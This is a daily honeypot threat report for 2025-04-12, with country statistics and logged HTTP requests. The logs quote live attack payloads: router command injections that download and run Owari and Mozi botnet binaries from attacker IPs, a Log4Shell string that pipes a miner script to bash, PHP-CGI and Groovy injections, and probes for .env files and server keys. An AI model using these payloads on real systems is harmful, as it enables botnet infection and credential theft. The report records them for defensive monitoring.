Daily Report: 2025-04-12#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 47 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1857 requests were recorded during the day, originating from 4 different countries, with a peak of 420 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| SG | Germany |
| US | Germany |
| US | Germany |
| JP | Germany |
| SG | Germany |
| US | Singapore |
| MY | Australia |
| US | Dubai |
| US | Dubai |
| CN | Georgia |
botnet_dropper_behaviour#
| remote_addr | request |
|---|---|
| 58.146.59.84 | GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1 |
| 222.85.37.31 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://222.85.37.31:43346/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
| 31.170.22.205 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(chmod+777+%2Ftmp%3B+cd+%2Ftmp%3B+wget+http%3A%2F%2F31.170.22.205%2Fdl17%3B+sh+dl17) HTTP/1.1 |
| 31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(chmod+777+/tmp;cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
| number_of_occurence | request | |
|---|---|---|
| 13 | 8 | POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D\x22\x22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1 |
| 34 | 4 | GET /$%7Bj$%7Bk8s:k5:-ND%7Di$%7Bsd:k5:-:%7Dldap://46.8.226.196:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMjYuMTk2L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjI2LjE5Ni9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1 |
| 88 | 2 | GET /AHT/AHT_UI/config.prod.js HTTP/1.1 |
| 130 | 2 | GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1 |
| 132 | 2 | GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1 |
| 143 | 2 | GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1 |
| 145 | 2 | GET /_all_dbs HTTP/1.1 |
| 148 | 2 | GET /?rest_route=/wp/v2/users/ HTTP/1.1 |
| 150 | 2 | GET /@vite/env HTTP/1.1 |
| 155 | 2 | GET /about HTTP/1.1 |
| 281 | 1 | POST /.env.development HTTP/1.1 |
| 284 | 1 | POST /laravel/.env HTTP/1.1 |
| 303 | 1 | POST /.env.project HTTP/1.1 |
| 305 | 1 | POST /development/.env HTTP/1.1 |
| 309 | 1 | POST /live_env HTTP/1.1 |
| 315 | 1 | POST /admin-app/.env HTTP/1.1 |
| 322 | 1 | POST /app/.env HTTP/1.1 |
| 327 | 1 | GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20 HTTP/1.1 |
| 397 | 1 | GET /odinhttpcall1744439663 HTTP/1.1 |
| 411 | 1 | GET /Odin/http/call1744439663 HTTP/1.1 |
| 412 | 1 | GET /OdinHttpCall1744439663 HTTP/1.1 |
| 416 | 1 | GET /api HTTP/1.1 |
| 417 | 1 | GET /.env_example HTTP/1.1 |
| 428 | 1 | GET /s/236313e2535313e29393e2933313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 |
| 433 | 1 | GET /env.test.js HTTP/1.1 |
| 435 | 1 | GET /config/settings.ini HTTP/1.1 |
| 436 | 1 | GET /env.prod.js HTTP/1.1 |
| 437 | 1 | GET /.venv HTTP/1.1 |
| 440 | 1 | GET /.environment HTTP/1.1 |
| 478 | 1 | GET /docker.sh HTTP/1.1 |
| 480 | 1 | GET /src/app.js HTTP/1.1 |
| 482 | 1 | GET /php5.ini HTTP/1.1 |
| 483 | 1 | GET /dump.sh HTTP/1.1 |
| 484 | 1 | GET /server.key HTTP/1.1 |
| 487 | 1 | GET /storage/app/private/.env HTTP/1.1 |
| 509 | 1 | POST /index HTTP/1.1 |
| 511 | 1 | GET /s/3323e2832323e27353e21333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 |
| 517 | 1 | \x00\x0E8\xF7\xBC\xA2\xAE\x8AV \xC6\x00\x00\x00\x00\x00 |
| 518 | 1 | \x00\x0E\x08\xF7\xBC\xA2\xAE\x8AV \xC6\x00\x00\x00\x00\x00 |
| 527 | 1 | GET /i2yH HTTP/1.1 |
| 529 | 1 | GET /socket.io/1/?t=1744479887263 HTTP/1.1 |
| 547 | 1 | GET /odinhttpcall1744426989 HTTP/1.1 |
| 552 | 1 | GET /7iXd HTTP/1.1 |
| 562 | 1 | GET /Odin/http/call1744426989 HTTP/1.1 |
| 563 | 1 | GET /OdinHttpCall1744426989 HTTP/1.1 |
| 592 | 1 | POST /apps/.env HTTP/1.1 |
| 598 | 1 | GET /hhZ2 HTTP/1.1 |
country_iso_code#
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 420 | GB |
| 1 | 345 | US |
| 2 | 198 | NL |
| 3 | 151 | SC |
| 4 | 144 | DE |
| 5 | 109 | MY |
| 6 | 108 | BG |
| 7 | 102 | PL |
| 8 | 49 | VN |
| 9 | 26 | CN |
| 10 | 23 | NO |
| 11 | 20 | HK |
| 12 | 19 | CH |
| 13 | 18 | FR |
| 14 | 17 | NG |
| 15 | 17 | LV |
| 16 | 12 | ID |
| 17 | 9 | PT |
| 18 | 7 | JP |
| 19 | 6 | CA |
| 20 | 6 | KR |
| 21 | 6 | BE |
| 22 | 5 | IN |
| 23 | 4 | SG |
| 24 | 4 | UA |
| 25 | 4 | TH |
| 26 | 4 | TR |
| 27 | 4 | IR |
| 28 | 3 | RU |
| 29 | 3 | IT |
| 30 | 2 | MD |
| 31 | 2 | GR |
| 32 | 2 | BR |
| 33 | 1 | AU |
| 34 | 1 | MC |
| 35 | 1 | VE |
| 36 | 1 | BD |
| 37 | 1 | EE |
| 38 | 1 | AE |
| 39 | 1 | PK |
| 40 | 1 | AO |